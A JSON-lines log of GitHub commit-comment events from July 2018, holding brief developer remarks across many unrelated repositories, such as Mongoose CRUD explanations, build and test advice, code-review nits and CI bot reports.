{"id":"8021888726","type":"CommitCommentEvent","actor":{"login":"MBA1376"},"repo":{"name":"MBA1376/node-course-2-todo-api"},"payload":{"comment":{"id":29841897,"position":null,"line":null,"path":null,"commit_id":"c1294243d7848610a01c3f308c153d3df4e213d4","created_at":"2018-07-26T10:40:11Z","updated_at":"2018-07-26T10:40:11Z","author_association":"OWNER","body":"we have three method for read object from database\r\n1 : find\r\n2 : findOne\r\n3 : findById"}},"created_at":"2018-07-26T10:40:11Z"}
{"id":"8021889048","type":"CommitCommentEvent","actor":{"login":"sravanthiboyalla"},"repo":{"name":"sravanthiboyalla/guvi"},"payload":{"comment":{"id":29841900,"position":null,"line":null,"path":null,"commit_id":"aef882da0f760b44963179cb674e3657b9075220","created_at":"2018-07-26T10:40:15Z","updated_at":"2018-07-26T10:40:15Z","author_association":"OWNER","body":"sample"}},"created_at":"2018-07-26T10:40:15Z"}
{"id":"8021889687","type":"CommitCommentEvent","actor":{"login":"EdSchouten"},"repo":{"name":"bazelbuild/rules_go"},"payload":{"comment":{"id":29841902,"position":5,"line":149,"path":"go/private/repositories.bzl","commit_id":"9ff93c2dbeacf639338d69821bf32c35d3464253","created_at":"2018-07-26T10:40:24Z","updated_at":"2018-07-26T10:40:24Z","author_association":"NONE","body":"This repository seems to take an excruciating amount of time to clone over somewhat slower links. Would it make sense to use `http_archive` here instead?"}},"created_at":"2018-07-26T10:40:24Z"}
{"id":"8021901203","type":"CommitCommentEvent","actor":{"login":"anativ"},"repo":{"name":"reversim/reversim-summit-2018"},"payload":{"comment":{"id":29841920,"position":null,"line":null,"path":null,"commit_id":"fdef27bf4f78b82450f2fa90a847da1f67c76ee4","created_at":"2018-07-26T10:42:53Z","updated_at":"2018-07-26T10:42:53Z","author_association":"COLLABORATOR","body":"if you run `nodemon dev.js` it will restart the server on every client change."}},"created_at":"2018-07-26T10:42:53Z"}
{"id":"8021903261","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Jekaa/Stockfish"},"payload":{"comment":{"id":29841923,"position":null,"line":null,"path":null,"commit_id":"b4be0dc57f79460bb310493acf8b48b6b68215e4","created_at":"2018-07-26T10:43:21Z","updated_at":"2018-07-26T10:43:21Z","author_association":"NONE","body":"You setup your test wrong. Your testing bench includes the latest commit 'Remove condition for pawn threats' but your base branch not. Please update master also and resubmit test."}},"created_at":"2018-07-26T10:43:21Z"}
{"id":"8021907073","type":"CommitCommentEvent","actor":{"login":"Vishwaraj13"},"repo":{"name":"agrawaljay38/GTU"},"payload":{"comment":{"id":29841931,"position":8,"line":8,"path":"admin_details.jsp","commit_id":"88ea719bf3cd3ba95231cc561c47fa1b26262af3","created_at":"2018-07-26T10:44:10Z","updated_at":"2018-07-26T10:44:10Z","author_association":"NONE","body":"\r\nbe .jsp files toh upload j nai hoti"}},"created_at":"2018-07-26T10:44:10Z"}
{"id":"8021909222","type":"CommitCommentEvent","actor":{"login":"navytux"},"repo":{"name":"signal18/replication-manager"},"payload":{"comment":{"id":29841934,"position":5,"line":5,"path":"graphite/og-rek/ogorek.go","commit_id":"f3dcf4b7875842cc1c5211543e361a8cde06ed74","created_at":"2018-07-26T10:44:36Z","updated_at":"2018-07-26T10:44:36Z","author_association":"NONE","body":"Thanks for correcting. May I ask to please correct it in all related branches? This commit (f3dcf4b7) is dated 2017-03-01 and comes before 1.1.0-preview1. This way the state on e.g. 1.1 branch is thus remains with incorrect copyright, authorship and license:\r\n\r\nhttps://github.com/signal18/replication-manager/blob/1.1/graphite/og-rek/ogorek.go"}},"created_at":"2018-07-26T10:44:36Z"}
{"id":"8021910996","type":"CommitCommentEvent","actor":{"login":"aahil30060"},"repo":{"name":"bundler/bundler"},"payload":{"comment":{"id":29841935,"position":4,"line":7,"path":".github/welcome_message.md","commit_id":"c42f9c471def565235c1dfc964abaabbaa3c0e82","created_at":"2018-07-26T10:44:59Z","updated_at":"2018-07-26T10:44:59Z","author_association":"NONE","body":"https://github.com/bundler/bundler/blob/master/CONTRIBUTING.md"}},"created_at":"2018-07-26T10:44:59Z"}
{"id":"8021916023","type":"CommitCommentEvent","actor":{"login":"amitzur"},"repo":{"name":"reversim/reversim-summit-2018"},"payload":{"comment":{"id":29841945,"position":null,"line":null,"path":null,"commit_id":"fdef27bf4f78b82450f2fa90a847da1f67c76ee4","created_at":"2018-07-26T10:46:02Z","updated_at":"2018-07-26T10:46:02Z","author_association":"NONE","body":"yeah, I was just pointing out that there's no need to run `nodemon dev.js` because inside `dev.js` there is a call to `nodemon`"}},"created_at":"2018-07-26T10:46:02Z"}
{"id":"8021917291","type":"CommitCommentEvent","actor":{"login":"cryptozeny"},"repo":{"name":"cryptozeny/cpuminer-mc-yespower"},"payload":{"comment":{"id":29841949,"position":11,"line":66,"path":"cpu-miner.c","commit_id":"aef30850518efc82feb6263779e1f3599c796ed7","created_at":"2018-07-26T10:46:19Z","updated_at":"2018-07-26T10:46:19Z","author_association":"OWNER","body":"Thanks for the advice! :+1: "}},"created_at":"2018-07-26T10:46:19Z"}
{"id":"8021919486","type":"CommitCommentEvent","actor":{"login":"SibasishTripathyy"},"repo":{"name":"SibasishTripathyy/Python-for-Data-Science"},"payload":{"comment":{"id":29841951,"position":null,"line":null,"path":null,"commit_id":"c2588d647e04442c6738e3a05ea2b16f63ea4d3b","created_at":"2018-07-26T10:46:48Z","updated_at":"2018-07-26T10:46:48Z","author_association":"OWNER","body":"Wasn't (Small typo)"}},"created_at":"2018-07-26T10:46:48Z"}
{"id":"8021921978","type":"CommitCommentEvent","actor":{"login":"MBA1376"},"repo":{"name":"MBA1376/node-course-2-todo-api"},"payload":{"comment":{"id":29841957,"position":null,"line":null,"path":null,"commit_id":"50e91b5644be0db98b1d3dc23bd9fc8ad0d7195b","created_at":"2018-07-26T10:47:22Z","updated_at":"2018-07-26T10:47:22Z","author_association":"OWNER","body":"we check four case  in this case : \r\n1 : if the id is valid\r\n2 : if data come back\r\n3 : if data doesnt come back\r\n4 : if exception occurred"}},"created_at":"2018-07-26T10:47:22Z"}
{"id":"8021922456","type":"CommitCommentEvent","actor":{"login":"harishdara224"},"repo":{"name":"harishdara224/new1"},"payload":{"comment":{"id":29841959,"position":null,"line":null,"path":null,"commit_id":"d44a63689f577e0e57e20603cbb02335572a7ae4","created_at":"2018-07-26T10:47:28Z","updated_at":"2018-07-26T10:47:28Z","author_association":"OWNER","body":"hh"}},"created_at":"2018-07-26T10:47:28Z"}
{"id":"8021923506","type":"CommitCommentEvent","actor":{"login":"Kaizien"},"repo":{"name":"Kaizien/HackerRank"},"payload":{"comment":{"id":29841962,"position":null,"line":null,"path":null,"commit_id":"2ad4c5331f8dba017c3a74c98adba04db238ab5c","created_at":"2018-07-26T10:47:42Z","updated_at":"2018-07-26T10:47:42Z","author_association":"OWNER","body":"https://www.hackerrank.com/challenges/2d-array/problem"}},"created_at":"2018-07-26T10:47:42Z"}
{"id":"8021924418","type":"CommitCommentEvent","actor":{"login":"iPieter"},"repo":{"name":"iPieter/rule_engine_dart"},"payload":{"comment":{"id":29841964,"position":null,"line":null,"path":null,"commit_id":"cad340169ef27cc5f0f259f1855f196ab6f4cc37","created_at":"2018-07-26T10:47:53Z","updated_at":"2018-07-26T10:47:53Z","author_association":"OWNER","body":"marvelous"}},"created_at":"2018-07-26T10:47:53Z"}
{"id":"8021928091","type":"CommitCommentEvent","actor":{"login":"daraharish224"},"repo":{"name":"harishdara224/new1"},"payload":{"comment":{"id":29841973,"position":null,"line":null,"path":null,"commit_id":"d44a63689f577e0e57e20603cbb02335572a7ae4","created_at":"2018-07-26T10:48:40Z","updated_at":"2018-07-26T10:48:40Z","author_association":"COLLABORATOR","body":"ok done"}},"created_at":"2018-07-26T10:48:40Z"}
{"id":"8021928854","type":"CommitCommentEvent","actor":{"login":"daraharish224"},"repo":{"name":"harishdara224/new1"},"payload":{"comment":{"id":29841974,"position":null,"line":null,"path":null,"commit_id":"d44a63689f577e0e57e20603cbb02335572a7ae4","created_at":"2018-07-26T10:48:50Z","updated_at":"2018-07-26T10:48:50Z","author_association":"COLLABORATOR","body":"fff"}},"created_at":"2018-07-26T10:48:50Z"}
{"id":"8021930451","type":"CommitCommentEvent","actor":{"login":"stevieflow"},"repo":{"name":"cooperativesuk/worker-co-op-model-rules-company-limited-by-shares"},"payload":{"comment":{"id":29841976,"position":null,"line":null,"path":null,"commit_id":"a1dc04395e9cbbe43f281b6907a75742edd01255","created_at":"2018-07-26T10:49:13Z","updated_at":"2018-07-26T10:49:13Z","author_association":"CONTRIBUTOR","body":"@athertonjohn I think this is a change you want to see in the rules from the first version?\r\n\r\n"}},"created_at":"2018-07-26T10:49:13Z"}
{"id":"8021934567","type":"CommitCommentEvent","actor":{"login":"MBA1376"},"repo":{"name":"MBA1376/node-course-2-todo-api"},"payload":{"comment":{"id":29841983,"position":null,"line":null,"path":null,"commit_id":"833141f63441407c1185a2522f6ae1c41b0539f0","created_at":"2018-07-26T10:50:07Z","updated_at":"2018-07-26T10:50:07Z","author_association":"OWNER","body":"we use remove method in mongoose to delete data"}},"created_at":"2018-07-26T10:50:07Z"}
{"id":"8021934759","type":"CommitCommentEvent","actor":{"login":"Kralizek"},"repo":{"name":"aws/aws-lambda-dotnet"},"payload":{"comment":{"id":29841984,"position":4,"line":4,"path":"Libraries/src/Amazon.Lambda.ScheduledEvents/Amazon.Lambda.ScheduledEvents.csproj","commit_id":"ebf80bcbdc3fdb95f0927c5c20542342d8ff1780","created_at":"2018-07-26T10:50:10Z","updated_at":"2018-07-26T10:50:10Z","author_association":"NONE","body":"Not a maintainer, any reason for not using netstandard moniker? "}},"created_at":"2018-07-26T10:50:10Z"}
{"id":"8021938239","type":"CommitCommentEvent","actor":{"login":"freeman0432"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":29841987,"position":null,"line":null,"path":null,"commit_id":"73b81c90b44577c017f7405fb542bf7d3e01bd84","created_at":"2018-07-26T10:50:53Z","updated_at":"2018-07-26T10:50:53Z","author_association":"CONTRIBUTOR","body":"The “text” is more meaningful than \"test\"  in context."}},"created_at":"2018-07-26T10:50:53Z"}
{"id":"8021940217","type":"CommitCommentEvent","actor":{"login":"eciaF"},"repo":{"name":"SoPra18-07/Singularity"},"payload":{"comment":{"id":29841993,"position":14,"line":363,"path":"Singularity/Singularity/Screen/ScreenClasses/UserInterfaceScreen.cs","commit_id":"733b66c7a3c7d0fbaaf6c2d31b5f1bd5e7639c61","created_at":"2018-07-26T10:51:20Z","updated_at":"2018-07-26T10:51:20Z","author_association":"CONTRIBUTOR","body":"0 is a valid graph id. It's the id of the first graph - meaning the CC after building it from the settler."}},"created_at":"2018-07-26T10:51:20Z"}
{"id":"8021940406","type":"CommitCommentEvent","actor":{"login":"ralphtheninja"},"repo":{"name":"deltachat/deltachat-node"},"payload":{"comment":{"id":29841994,"position":null,"line":null,"path":null,"commit_id":"7e89ed1df216d709c8d0d8bf253c96e631e4ff53","created_at":"2018-07-26T10:51:23Z","updated_at":"2018-07-26T10:51:23Z","author_association":"MEMBER","body":"Yeah, so now we can run `standard` linter on the js code :wink: But always good to be up and running. We can add more tests etc."}},"created_at":"2018-07-26T10:51:23Z"}
{"id":"8021943630","type":"CommitCommentEvent","actor":{"login":"dung11112003"},"repo":{"name":"dung11112003/Reg2InfUI"},"payload":{"comment":{"id":29841999,"position":null,"line":null,"path":null,"commit_id":"4c39adf6551a2c1721ddf62be58f61bd54a86e24","created_at":"2018-07-26T10:52:05Z","updated_at":"2018-07-26T10:52:05Z","author_association":"OWNER","body":"."}},"created_at":"2018-07-26T10:52:05Z"}
{"id":"8021943780","type":"CommitCommentEvent","actor":{"login":"stevieflow"},"repo":{"name":"cooperativesuk/worker-co-op-model-rules-company-limited-by-shares"},"payload":{"comment":{"id":29842000,"position":null,"line":null,"path":null,"commit_id":"a1dc04395e9cbbe43f281b6907a75742edd01255","created_at":"2018-07-26T10:52:07Z","updated_at":"2018-07-26T10:52:07Z","author_association":"CONTRIBUTOR","body":"@BibianaC I can see this commit was made directly on the master, so it is in the rules\r\n\r\nI think that's fine, as it was a change to the source rules that @athertonjohn wanted to make, before we version the document\r\n\r\n@athertonjohn for future reference, we'll show you how to make branches for any edits- but this seems fine"}},"created_at":"2018-07-26T10:52:07Z"}
{"id":"8021944663","type":"CommitCommentEvent","actor":{"login":"cryptozeny"},"repo":{"name":"cryptozeny/cpuminer-mc-yespower"},"payload":{"comment":{"id":29842002,"position":11,"line":66,"path":"cpu-miner.c","commit_id":"aef30850518efc82feb6263779e1f3599c796ed7","created_at":"2018-07-26T10:52:17Z","updated_at":"2018-07-26T10:52:17Z","author_association":"OWNER","body":"@solardiz One more question. Is it better to upgrade the `bitzeny core wallet` (bitzenyd & bitzeny-qt) to `yespower0.5`?"}},"created_at":"2018-07-26T10:52:17Z"}
{"id":"8021944791","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29842003,"position":null,"line":null,"path":null,"commit_id":"2b92aeea905ed59efaa4e7f11735ba033f42d202","created_at":"2018-07-26T10:52:19Z","updated_at":"2018-07-26T10:52:19Z","author_association":"OWNER","body":"I would believe that removing a method call would qualify.  Although the text of the code looks quite similar the method call is another branch of code that is gone."}},"created_at":"2018-07-26T10:52:19Z"}
{"id":"8021956976","type":"CommitCommentEvent","actor":{"login":"AlexInntekt"},"repo":{"name":"AlexInntekt/learningDjango2"},"payload":{"comment":{"id":29842021,"position":null,"line":null,"path":null,"commit_id":"fbd859b7124fa4ba77b45a21f10d01b853a35140","created_at":"2018-07-26T10:54:53Z","updated_at":"2018-07-26T10:54:53Z","author_association":"OWNER","body":"-TemplateView is a template like the previous View.\r\n-First import it into views.py:\r\n  from django.views.generic.base import TemplateView\r\n-And asociate it with a current page:\r\n\r\n  class ContactTemplateView(TemplateView):\r\n      template_name = 'home.html'\r\n\r\nDo the same setup in urls like using a 'View', and instantiate the template with .as_view():\r\n ... path('ContactTemplateView/',ContactTemplateView.as_view(), name='ContactTemplateView') ...\r\n\r\n"}},"created_at":"2018-07-26T10:54:53Z"}
{"id":"8021958082","type":"CommitCommentEvent","actor":{"login":"neuroscr"},"repo":{"name":"majestrate/llarp"},"payload":{"comment":{"id":29842024,"position":null,"line":null,"path":null,"commit_id":"6708654a6f1525634d3d0d769e6480567121a4fc","created_at":"2018-07-26T10:55:08Z","updated_at":"2018-07-26T10:55:08Z","author_association":"CONTRIBUTOR","body":"Why? This is causing some minor issues on my side. Should that be -lpthread ?"}},"created_at":"2018-07-26T10:55:08Z"}
{"id":"8021961614","type":"CommitCommentEvent","actor":{"login":"eciaF"},"repo":{"name":"SoPra18-07/Singularity"},"payload":{"comment":{"id":29842032,"position":23,"line":373,"path":"Singularity/Singularity/Screen/ScreenClasses/UserInterfaceScreen.cs","commit_id":"733b66c7a3c7d0fbaaf6c2d31b5f1bd5e7639c61","created_at":"2018-07-26T10:55:51Z","updated_at":"2018-07-26T10:55:51Z","author_association":"CONTRIBUTOR","body":"The 'if count..' doesn't make any sense, because if the count is <= 0 you will have crashes either way. No need to check that here, since the game will crash immediately after that either way. So all the if does is move the crash position of an event that shouldn't be possible."}},"created_at":"2018-07-26T10:55:51Z"}
{"id":"8021964021","type":"CommitCommentEvent","actor":{"login":"neuroscr"},"repo":{"name":"loki-project/loki-network"},"payload":{"comment":{"id":29842036,"position":null,"line":null,"path":null,"commit_id":"937a35464ee04db3bebfd4e7f5670bd6807235a8","created_at":"2018-07-26T10:56:24Z","updated_at":"2018-07-26T10:56:24Z","author_association":"COLLABORATOR","body":"cough"}},"created_at":"2018-07-26T10:56:24Z"}
{"id":"8021964640","type":"CommitCommentEvent","actor":{"login":"timleslie"},"repo":{"name":"guns/golibs"},"payload":{"comment":{"id":29842038,"position":null,"line":null,"path":null,"commit_id":"8a8577ce6c8dcdcf5778f59f841ed6db1ae1d857","created_at":"2018-07-26T10:56:32Z","updated_at":"2018-07-26T10:56:32Z","author_association":"NONE","body":"Likewise, glad to hear the scipy implementation has served as a useful reference point! 🎉 \r\n\r\nAnd hey @DavePearce, thanks for writing up your paper in the first place. I really enjoyed the process of studying it and understanding it to the point of being able to fully implement it."}},"created_at":"2018-07-26T10:56:32Z"}
{"id":"8021970717","type":"CommitCommentEvent","actor":{"login":"augsteyer"},"repo":{"name":"shopgate/cloud-integration-magento"},"payload":{"comment":{"id":29842051,"position":14,"line":83,"path":"src/app/code/community/Shopgate/Cloudapi/Helper/Preflight.php","commit_id":"b6d613b2ef3cdd6387cd0e6fe847e0e789885147","created_at":"2018-07-26T10:57:57Z","updated_at":"2018-07-26T10:57:57Z","author_association":"MEMBER","body":"yup, switched. Was too lazy to undo as UPDATE was already there. Although, now that I think about it, there is no such thing as update."}},"created_at":"2018-07-26T10:57:57Z"}
{"id":"8021972753","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29842055,"position":null,"line":null,"path":null,"commit_id":"73281ffba303cbd55bfa8f4e7e5646843f39866d","created_at":"2018-07-26T10:58:23Z","updated_at":"2018-07-26T10:58:23Z","author_association":"NONE","body":"159313706_Issue#6796 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2985 of 2985 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T10:58:23Z"}
{"id":"8021976167","type":"CommitCommentEvent","actor":{"login":"nsamsono"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29842059,"position":103,"line":103,"path":"doc/guides/nics/lport.rst","commit_id":"80a5c0e4d1e28691b43fbc101e77e93663100072","created_at":"2018-07-26T10:59:10Z","updated_at":"2018-07-26T10:59:10Z","author_association":"NONE","body":"Not clear what exactly config file"}},"created_at":"2018-07-26T10:59:10Z"}
{"id":"8021976400","type":"CommitCommentEvent","actor":{"login":"MaxBazarov"},"repo":{"name":"MaxBazarov/exporter"},"payload":{"comment":{"id":29842060,"position":null,"line":null,"path":null,"commit_id":"9851093614f4d4eac955f0a2abff3fa1aca79c5d","created_at":"2018-07-26T10:59:13Z","updated_at":"2018-07-26T10:59:13Z","author_association":"OWNER","body":"Hi Colin,\n\nI just published the new version with support for “Previous Artboard” link target.\nPlease check it.\n\n\n> On 25 Jul 2018, at 23:16, cpshanley <notifications@github.com> wrote:\n> \n> Brilliant. Top man.\n> Overlays after that, I hope!\n> All the best, Colin.\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/MaxBazarov/exporter/commit/9851093614f4d4eac955f0a2abff3fa1aca79c5d#commitcomment-29834917>, or mute the thread <https://github.com/notifications/unsubscribe-auth/ARkKgqiprndQ-aP50eWGJO-r3y8BwC9Yks5uKNINgaJpZM4VgkS9>.\n> \n\n"}},"created_at":"2018-07-26T10:59:13Z"}
{"id":"8021976784","type":"CommitCommentEvent","actor":{"login":"augsteyer"},"repo":{"name":"shopgate/cloud-integration-magento"},"payload":{"comment":{"id":29842061,"position":14,"line":83,"path":"src/app/code/community/Shopgate/Cloudapi/Helper/Preflight.php","commit_id":"b6d613b2ef3cdd6387cd0e6fe847e0e789885147","created_at":"2018-07-26T10:59:18Z","updated_at":"2018-07-26T10:59:18Z","author_association":"MEMBER","body":"I am technically not removing update completely, I am just rerouting single entry POSTS to the Update handler. PUT may one day be implemented if some bloke figures out the issue with 5.3-5.5. It will also be needed for 1 endpoint later, I don't remember on top of my head which one."}},"created_at":"2018-07-26T10:59:18Z"}
{"id":"8021980891","type":"CommitCommentEvent","actor":{"login":"adavelli"},"repo":{"name":"adavelli/newGH"},"payload":{"comment":{"id":29842070,"position":null,"line":null,"path":null,"commit_id":"2a66d419dccb1025887e9f9fb6bfa1b257838131","created_at":"2018-07-26T11:00:11Z","updated_at":"2018-07-26T11:00:11Z","author_association":"OWNER","body":"superb !"}},"created_at":"2018-07-26T11:00:11Z"}
{"id":"8021985302","type":"CommitCommentEvent","actor":{"login":"mrwebc"},"repo":{"name":"mvcweb75/community"},"payload":{"comment":{"id":29842081,"position":5,"line":5,"path":"프로젝트 사전작업과 주의사항.txt","commit_id":"ce2030ac9f228b0757d74b508f68b4980ba2b921","created_at":"2018-07-26T11:01:05Z","updated_at":"2018-07-26T11:01:05Z","author_association":"COLLABORATOR","body":"들여쓰기를 수정해 주세요"}},"created_at":"2018-07-26T11:01:05Z"}
{"id":"8021985785","type":"CommitCommentEvent","actor":{"login":"mrwebc"},"repo":{"name":"mvcweb75/community"},"payload":{"comment":{"id":29842082,"position":9,"line":9,"path":"프로젝트 사전작업과 주의사항.txt","commit_id":"ce2030ac9f228b0757d74b508f68b4980ba2b921","created_at":"2018-07-26T11:01:11Z","updated_at":"2018-07-26T11:01:11Z","author_association":"COLLABORATOR","body":"들여쓰기를 수정해 주세요"}},"created_at":"2018-07-26T11:01:11Z"}
{"id":"8021986739","type":"CommitCommentEvent","actor":{"login":"ivanwebtempleasia"},"repo":{"name":"ivanwebtempleasia/hello-world"},"payload":{"comment":{"id":29842085,"position":null,"line":null,"path":null,"commit_id":"652d5390f294fae1f766229c253009cc68b64f5e","created_at":"2018-07-26T11:01:23Z","updated_at":"2018-07-26T11:01:23Z","author_association":"OWNER","body":"not like this"}},"created_at":"2018-07-26T11:01:23Z"}
{"id":"8021987627","type":"CommitCommentEvent","actor":{"login":"mrwebc"},"repo":{"name":"mvcweb75/community"},"payload":{"comment":{"id":29842092,"position":13,"line":13,"path":"프로젝트 사전작업과 주의사항.txt","commit_id":"ce2030ac9f228b0757d74b508f68b4980ba2b921","created_at":"2018-07-26T11:01:35Z","updated_at":"2018-07-26T11:01:35Z","author_association":"COLLABORATOR","body":"들여쓰기를 수정해 주세요"}},"created_at":"2018-07-26T11:01:35Z"}
{"id":"8021987937","type":"CommitCommentEvent","actor":{"login":"ulf1"},"repo":{"name":"ulf1/oxyba"},"payload":{"comment":{"id":29842093,"position":null,"line":null,"path":null,"commit_id":"f28dab60a664f6b1d02459d4518548b5c23c8d80","created_at":"2018-07-26T11:01:40Z","updated_at":"2018-07-26T11:01:40Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [linreg_ols_lu](https://trello.com/c/CDGGrcn6/62-linregolslu)"}},"created_at":"2018-07-26T11:01:40Z"}
{"id":"8021992527","type":"CommitCommentEvent","actor":{"login":"mvcweb75"},"repo":{"name":"mvcweb75/community"},"payload":{"comment":{"id":29842097,"position":9,"line":9,"path":"프로젝트 사전작업과 주의사항.txt","commit_id":"ce2030ac9f228b0757d74b508f68b4980ba2b921","created_at":"2018-07-26T11:02:40Z","updated_at":"2018-07-26T11:02:40Z","author_association":"OWNER","body":"들여쓰기를 수정해 주세요"}},"created_at":"2018-07-26T11:02:40Z"}
{"id":"8021993035","type":"CommitCommentEvent","actor":{"login":"mvcweb75"},"repo":{"name":"mvcweb75/community"},"payload":{"comment":{"id":29842098,"position":13,"line":13,"path":"프로젝트 사전작업과 주의사항.txt","commit_id":"ce2030ac9f228b0757d74b508f68b4980ba2b921","created_at":"2018-07-26T11:02:46Z","updated_at":"2018-07-26T11:02:46Z","author_association":"OWNER","body":"들여쓰기를 수정해 주세요"}},"created_at":"2018-07-26T11:02:46Z"}
{"id":"8021995548","type":"CommitCommentEvent","actor":{"login":"MBA1376"},"repo":{"name":"MBA1376/node-course-2-todo-api"},"payload":{"comment":{"id":29842101,"position":null,"line":null,"path":null,"commit_id":"9d3a83eee806db1680b6873598cfb40f2f884aab","created_at":"2018-07-26T11:03:18Z","updated_at":"2018-07-26T11:03:18Z","author_association":"OWNER","body":"now though we have this in place , i wanna explain \" crud \" operation in mongoose 🔢 \r\n1 : \"save\" method create a object in database\r\n2 : \"find , findOne and findById\" read object from database\r\n3 :\" remove , findOneAndRemove and findByIdAndRemove\" delete object from database\r\n4 : \" update , findByIdAndUpdate\" update object in database "}},"created_at":"2018-07-26T11:03:18Z"}
{"id":"8021996886","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29842106,"position":null,"line":null,"path":null,"commit_id":"73281ffba303cbd55bfa8f4e7e5646843f39866d","created_at":"2018-07-26T11:03:35Z","updated_at":"2018-07-26T11:03:35Z","author_association":"NONE","body":"159313706_Issue#6796 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-26T11:03:35Z"}
{"id":"8021997615","type":"CommitCommentEvent","actor":{"login":"preda-bogdan"},"repo":{"name":"LauraCarmen/processing-text"},"payload":{"comment":{"id":29842108,"position":9,"line":9,"path":"index_text.js","commit_id":"9de18a8259cb77e06bcf714178f2ac123095a7cd","created_at":"2018-07-26T11:03:45Z","updated_at":"2018-07-26T11:03:45Z","author_association":"COLLABORATOR","body":"Before this `for` loop you should create an empty array `result = []`"}},"created_at":"2018-07-26T11:03:45Z"}
{"id":"8022000470","type":"CommitCommentEvent","actor":{"login":"cryptozeny"},"repo":{"name":"cryptozeny/cpuminer-mc-yespower"},"payload":{"comment":{"id":29842110,"position":11,"line":66,"path":"cpu-miner.c","commit_id":"aef30850518efc82feb6263779e1f3599c796ed7","created_at":"2018-07-26T11:04:23Z","updated_at":"2018-07-26T11:04:23Z","author_association":"OWNER","body":"because bitzeny HF is not decided yet. we need more discussions on forum... :thinking: "}},"created_at":"2018-07-26T11:04:23Z"}
{"id":"8022003299","type":"CommitCommentEvent","actor":{"login":"preda-bogdan"},"repo":{"name":"LauraCarmen/processing-text"},"payload":{"comment":{"id":29842122,"position":14,"line":14,"path":"index_text.js","commit_id":"9de18a8259cb77e06bcf714178f2ac123095a7cd","created_at":"2018-07-26T11:05:01Z","updated_at":"2018-07-26T11:05:01Z","author_association":"COLLABORATOR","body":"After this loop you should assign the count to a result key eg. `result[cuvinte[i]] = count;`"}},"created_at":"2018-07-26T11:05:01Z"}
{"id":"8022003719","type":"CommitCommentEvent","actor":{"login":"MBA1376"},"repo":{"name":"MBA1376/node-course-2-todo-api"},"payload":{"comment":{"id":29842124,"position":null,"line":null,"path":null,"commit_id":"9d3a83eee806db1680b6873598cfb40f2f884aab","created_at":"2018-07-26T11:05:07Z","updated_at":"2018-07-26T11:05:07Z","author_association":"OWNER","body":"param object keep parameters like id or anything else that pass into url"}},"created_at":"2018-07-26T11:05:07Z"}
{"id":"8022005264","type":"CommitCommentEvent","actor":{"login":"zy4"},"repo":{"name":"proteinevolution/Toolkit"},"payload":{"comment":{"id":29842128,"position":null,"line":null,"path":null,"commit_id":"d9c084006b2525d4f3a8170fc6b7546fcb951d75","created_at":"2018-07-26T11:05:28Z","updated_at":"2018-07-26T11:05:28Z","author_association":"MEMBER","body":"no, only the error messages which are filtered by logback"}},"created_at":"2018-07-26T11:05:28Z"}
{"id":"8022007599","type":"CommitCommentEvent","actor":{"login":"preda-bogdan"},"repo":{"name":"LauraCarmen/processing-text"},"payload":{"comment":{"id":29842133,"position":15,"line":15,"path":"index_text.js","commit_id":"9de18a8259cb77e06bcf714178f2ac123095a7cd","created_at":"2018-07-26T11:05:58Z","updated_at":"2018-07-26T11:05:58Z","author_association":"COLLABORATOR","body":"And here you should return the result array"}},"created_at":"2018-07-26T11:05:58Z"}
{"id":"8022010051","type":"CommitCommentEvent","actor":{"login":"neuroscr"},"repo":{"name":"majestrate/llarp"},"payload":{"comment":{"id":29842139,"position":16,"line":36,"path":"daemon/dns.cpp","commit_id":"bbe0634edce05f160b690f367b06558ef76475ba","created_at":"2018-07-26T11:06:28Z","updated_at":"2018-07-26T11:06:28Z","author_association":"CONTRIBUTOR","body":"Configuration done in my fork"}},"created_at":"2018-07-26T11:06:28Z"}
{"id":"8022013909","type":"CommitCommentEvent","actor":{"login":"vikramalva"},"repo":{"name":"proteinevolution/Toolkit"},"payload":{"comment":{"id":29842150,"position":null,"line":null,"path":null,"commit_id":"d9c084006b2525d4f3a8170fc6b7546fcb951d75","created_at":"2018-07-26T11:07:18Z","updated_at":"2018-07-26T11:07:18Z","author_association":"MEMBER","body":"We shouldn't do this; we should use a local setup of sentry. "}},"created_at":"2018-07-26T11:07:18Z"}
{"id":"8022022849","type":"CommitCommentEvent","actor":{"login":"mrwebc"},"repo":{"name":"mvcweb75/community"},"payload":{"comment":{"id":29842170,"position":9,"line":9,"path":"프로젝트 사전작업과 주의사항.txt","commit_id":"ce2030ac9f228b0757d74b508f68b4980ba2b921","created_at":"2018-07-26T11:09:12Z","updated_at":"2018-07-26T11:09:12Z","author_association":"COLLABORATOR","body":"아, 정말 들여쓰기가 잘못됐네요."}},"created_at":"2018-07-26T11:09:12Z"}
